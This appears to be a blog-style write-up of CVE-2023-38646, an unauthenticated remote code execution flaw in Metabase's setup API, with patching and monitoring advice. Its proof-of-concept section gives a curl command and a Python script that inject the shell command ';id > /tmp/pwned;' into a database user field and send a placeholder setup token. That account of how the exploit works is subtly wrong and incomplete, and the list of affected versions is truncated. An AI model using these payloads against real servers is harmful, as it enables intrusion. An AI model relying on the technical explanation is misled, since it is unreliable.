CVE-2023-38646 - Breaking Metabase—How Unauthenticated Remote Code Execution Rocked BI Servers

If you’re using Metabase for business intelligence or dashboarding, there’s a critical security warning you need to hear about. CVE-2023-38646 is a high-impact vulnerability discovered in Metabase (both open source and enterprise editions) that lets an attacker execute any command on your server—no login required.

Let’s dive deep into what happened, how this works, some simple proof-of-concept (PoC) code, and how you should protect your Metabase deployments.

What Is Metabase?

Metabase is a popular open source tool for exploring and visualizing data, boasting hundreds of thousands of deployments worldwide. It’s often run as a web application on internal or public servers and connected directly to sensitive production databases.

Vulnerability in Plain English

In affected versions, a flaw in a setup API (normally only supposed to run during initial install) allowed any web user, at any time, to trigger code execution with any command on the underlying system. The web server would happily run whatever the attacker specified, using the full privileges granted to the Metabase process.

No authentication was needed—the endpoint was completely exposed.

Enterprise: before 1.46.6.1, 1.45.4.1, 1.44.7.1, 1.43.7.2

Fully patched releases can be found here.

Original advisory and technical details

- Metabase advisory
- Horizon3 exploit writeup

The Attack Surface

When first deploying Metabase, there’s a setup wizard that lets you create an admin user, configure databases, etc. This process exposed a /api/setup/validate endpoint. But critically, due to missing security checks, this endpoint remained callable and dangerously powerful.

It was intended for configuration—but in practice, it trusted user input far too much, and let raw OS command arguments slip through.

Step-by-Step Exploit

Let’s check out a practical example. Please only test this on your own systems!

1. Find a Vulnerable Metabase

Suppose you know a Metabase instance is running at http://target-metabase.com. You can confirm with HTTP:

curl http://target-metabase.com/api/session/properties

2. Exploit with a Simple cURL Command

The following POST will trick the setup API into running id, showing you the system user running Metabase. The output is buried in the error message.

curl -X POST 'http://target-metabase.com/api/setup/validate' \
    -H 'Content-Type: application/json' \
    --data '{"token":"setup-token","details":{"db":"h2","advanced-options":{"ssl":false},"details":{"db":"h2","user":";id > /tmp/pwned;","password":"","file":"/dev/null"}}}'

Explanation

- The malicious payload injects the id > /tmp/pwned; command in the username field (or other places).
- The output will be written to /tmp/pwned on the server.

Here’s the Python equivalent for easier reading

import requests

url = "http://target-metabase.com/api/setup/validate"
headers = {"Content-Type": "application/json"}
payload = {
    "token": "setup-token",
    "details": {
        "db": "h2",
        "advanced-options": {"ssl": False},
        "details": {
            "db": "h2",
            "user": ";id > /tmp/pwned;",
            "password": "",
            "file": "/dev/null"
        }
    }
}

response = requests.post(url, json=payload, headers=headers)
print(response.text)

How Did This Happen?

Metabase’s initial setup API neglected to verify if setup had already completed, and failed to sanitize or limit user input. The core problem is “trusting user input”—the server assumed no one would ever send malicious data, so it didn’t check.

1. Patch—*Immediately*!

Update to the latest Metabase version, even if you think your server isn’t exposed to the internet.

- Get latest open source release
- Upgrade instructions

2. Lock Server Access

If your Metabase is accessible from the internet, restrict it to internal IPs or VPN only. Do not expose your BI tools!

3. Monitor for Exploitation

Check your logs for unusual traffic to /api/setup/validate, or for commands run as the Metabase user. Look in /tmp and elsewhere for signs of created or modified files.

If you must expose Metabase, put it behind a firewall or a VPN

If you delayed patching, assume compromise and review your logs and systems carefully. This vulnerability is trivial to exploit and has been widely weaponized.

References and Further Reading

- Metabase Security Advisory: GHSA-j8q8-vh4w-rrcw
- Horizon3.ai: Root Cause & Exploitation
- Original Metabase GitHub Issue
- Metabase Releases

Stay safe—patch early, patch often, and keep your dashboards from turning into an attacker’s playground!

Timeline

Published on: 07/21/2023 15:15:10 UTC
Last modified on: 08/09/2023 18:15:13 UTC